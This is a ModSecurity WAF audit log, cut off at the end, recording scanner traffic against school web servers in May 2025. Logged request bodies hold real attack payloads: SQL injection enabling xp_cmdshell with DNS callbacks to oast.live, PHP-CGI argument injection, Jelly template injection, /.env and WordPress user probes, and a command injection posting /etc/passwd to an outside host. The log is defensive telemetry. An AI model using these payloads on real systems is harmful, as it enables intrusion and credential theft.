X-Forwarded-Proto: http Content-Length: 775 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166791101 --b3cbb421-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0rjil9gpeoh536h8tf0xh63s4uacz8e9.oast.live'-- --b3cbb421-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3cbb421-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748504334077077 3426 (- - -) Stopwatch2: 1748504334077077 3426; combined=2154, p1=471, p2=1608, p3=23, p4=25, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3cbb421-Z-- --c2262b46-A-- [29/May/2025:15:10:57 +0700] aDgWkWMaQtTb69S13pgG1QAAAEg 103.236.140.4 41304 103.236.140.4 8181 --c2262b46-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 111.90.177.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.90.177.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2262b46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2262b46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748506257234531 2850 (- - -) Stopwatch2: 1748506257234531 2850; combined=1462, p1=407, p2=999, p3=0, p4=0, p5=55, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2262b46-Z-- --e414815f-A-- [29/May/2025:15:23:52 +0700] aDgZmMX5pbyFXv2T3ipymAAAANI 103.236.140.4 51980 103.236.140.4 8181 --e414815f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.64.20 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.64.20 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e414815f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin& --e414815f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --e414815f-E-- --e414815f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748507032051333 5988 (- - -) Stopwatch2: 1748507032051333 5988; combined=4326, p1=476, p2=3639, p3=28, p4=33, p5=90, sr=86, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e414815f-Z-- --7326b724-A-- [29/May/2025:15:29:37 +0700] aDga8cX5pbyFXv2T3ip3CAAAAMU 103.236.140.4 40504 103.236.140.4 8181 --7326b724-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 169379742 --7326b724-C-- --7326b724-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7326b724-E-- --7326b724-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748507377419114 5062 (- - -) Stopwatch2: 1748507377419114 5062; combined=3460, p1=570, p2=2858, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7326b724-Z-- --d7a18571-A-- [29/May/2025:15:29:38 +0700] aDga8mMaQtTb69S13pgTuQAAAEM 103.236.140.4 40556 103.236.140.4 8181 --d7a18571-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 153697469 --d7a18571-C-- --d7a18571-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7a18571-E-- --d7a18571-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748507378414589 3614 (- - -) Stopwatch2: 1748507378414589 3614; combined=2070, p1=407, p2=1635, p3=0, p4=0, p5=27, sr=67, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7a18571-Z-- --f258dc5e-A-- [29/May/2025:15:29:39 +0700] aDga88X5pbyFXv2T3ip3FQAAAMU 103.236.140.4 40600 103.236.140.4 8181 --f258dc5e-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 15_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 169379778 --f258dc5e-C-- --f258dc5e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f258dc5e-E-- --f258dc5e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748507379414909 3234 (- - -) Stopwatch2: 1748507379414909 3234; combined=2041, p1=506, p2=1506, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f258dc5e-Z-- --623a7938-A-- [29/May/2025:15:29:40 +0700] aDga9P4vV4CoZ0MKLMP7ZQAAAIU 103.236.140.4 40652 103.236.140.4 8181 --623a7938-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 165263797 --623a7938-C-- --623a7938-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --623a7938-E-- --623a7938-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748507380415395 3670 (- - -) Stopwatch2: 1748507380415395 3670; combined=2120, p1=433, p2=1655, p3=0, p4=0, p5=31, sr=80, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --623a7938-Z-- --739c6f24-A-- [29/May/2025:15:30:15 +0700] aDgbF_4vV4CoZ0MKLMP7xQAAAI4 103.236.140.4 42258 103.236.140.4 8181 --739c6f24-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 775 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 165264400 --739c6f24-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0rjil9gpeoh536h8tf07b7jbowjmi8fz.oast.live'-- --739c6f24-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --739c6f24-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748507415863963 4420 (- - -) Stopwatch2: 1748507415863963 4420; combined=3055, p1=656, p2=2291, p3=36, p4=42, p5=30, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --739c6f24-Z-- --d502e878-A-- [29/May/2025:15:34:12 +0700] aDgcBP4vV4CoZ0MKLMP-5QAAAIQ 103.236.140.4 53380 103.236.140.4 8181 --d502e878-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.178.241 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.178.241 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --d502e878-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d502e878-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748507652742550 690 (- - -) Stopwatch2: 1748507652742550 690; combined=271, p1=237, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d502e878-Z-- --92edca5f-A-- [29/May/2025:15:44:50 +0700] aDgegmMaQtTb69S13pgWdgAAAEI 103.236.140.4 55070 103.236.140.4 8181 --92edca5f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.207.45.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.207.45.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --92edca5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92edca5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748508290274854 3302 (- - -) Stopwatch2: 1748508290274854 3302; combined=1521, p1=455, p2=1033, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92edca5f-Z-- --d77d2529-A-- [29/May/2025:15:56:14 +0700] aDghLv4vV4CoZ0MKLMP_QQAAAIY 103.236.140.4 55152 103.236.140.4 8181 --d77d2529-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.3 Safari/605.1.15 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153697984 --d77d2529-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d77d2529-E-- --d77d2529-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748508974279876 3148 (- - -) Stopwatch2: 1748508974279876 3148; combined=1192, p1=486, p2=676, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d77d2529-Z-- --05ea8360-A-- [29/May/2025:16:02:48 +0700] aDgiuP4vV4CoZ0MKLMP_VgAAAIA 103.236.140.4 55320 103.236.140.4 8181 --05ea8360-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.212.150.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.212.150.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --05ea8360-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05ea8360-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748509368924991 3149 (- - -) Stopwatch2: 1748509368924991 3149; combined=1406, p1=467, p2=905, p3=0, p4=0, p5=33, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05ea8360-Z-- --71773667-A-- [29/May/2025:16:05:53 +0700] aDgjcWMaQtTb69S13pgWmgAAAEY 103.236.140.4 55378 103.236.140.4 8181 --71773667-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.56.213.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.56.213.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --71773667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71773667-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748509553546987 3224 (- - -) Stopwatch2: 1748509553546987 3224; combined=1412, p1=468, p2=910, p3=0, p4=0, p5=34, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71773667-Z-- --e8567e13-A-- [29/May/2025:16:26:41 +0700] aDgoUX1Ye2lUDKzW1LvtFwAAABM 103.236.140.4 55742 103.236.140.4 8181 --e8567e13-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 YaBrowser/18.11.1.715 (beta) Yowser/2.5 Safari/537.36 Accept-Charset: utf-8 --e8567e13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8567e13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748510801067921 686 (- - -) Stopwatch2: 1748510801067921 686; combined=265, p1=232, p2=0, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8567e13-Z-- --95ca3770-A-- [29/May/2025:16:28:48 +0700] aDgo0H1Ye2lUDKzW1LvtHwAAAAc 103.236.140.4 55776 103.236.140.4 8181 --95ca3770-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 169274273 --95ca3770-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0rjil9gpeoh536h8tf01o7ezf834mp8u.oast.live) --95ca3770-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95ca3770-E-- --95ca3770-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched 